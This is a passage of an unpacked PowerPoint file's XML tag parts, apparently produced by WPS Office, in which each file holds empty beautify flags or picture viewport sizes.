  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag586.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag587.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag588.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag589.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag59.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag590.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag591.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag592.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag593.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag594.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag595.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag596.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag597.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag598.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag599.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag60.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag600.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag601.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag602.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag603.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag604.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag605.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag606.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag607.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag608.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag609.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag61.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag610.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag611.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag612.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag613.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag614.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag615.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag616.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:4590,&quot;width&quot;:6405}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag617.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag618.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag619.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag62.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag620.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag621.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag622.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag623.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag624.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag625.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag626.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag627.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag628.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag629.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag63.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag630.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag631.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag632.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag633.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag634.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag635.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag636.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag637.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag638.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag639.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag64.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag640.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag641.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag642.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag643.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag644.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag645.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag646.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag647.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag648.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag649.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag65.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag650.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag651.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag652.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag653.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag654.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag655.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag656.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag657.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag658.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag659.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag66.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag660.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag661.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag662.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag663.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag664.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag665.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag666.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag667.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag668.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag669.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag67.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag670.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag671.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag672.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag673.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag674.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag675.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag676.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag677.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag678.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag679.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag68.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag680.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag681.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag682.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag683.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag684.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag685.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag686.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag687.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag688.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag689.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
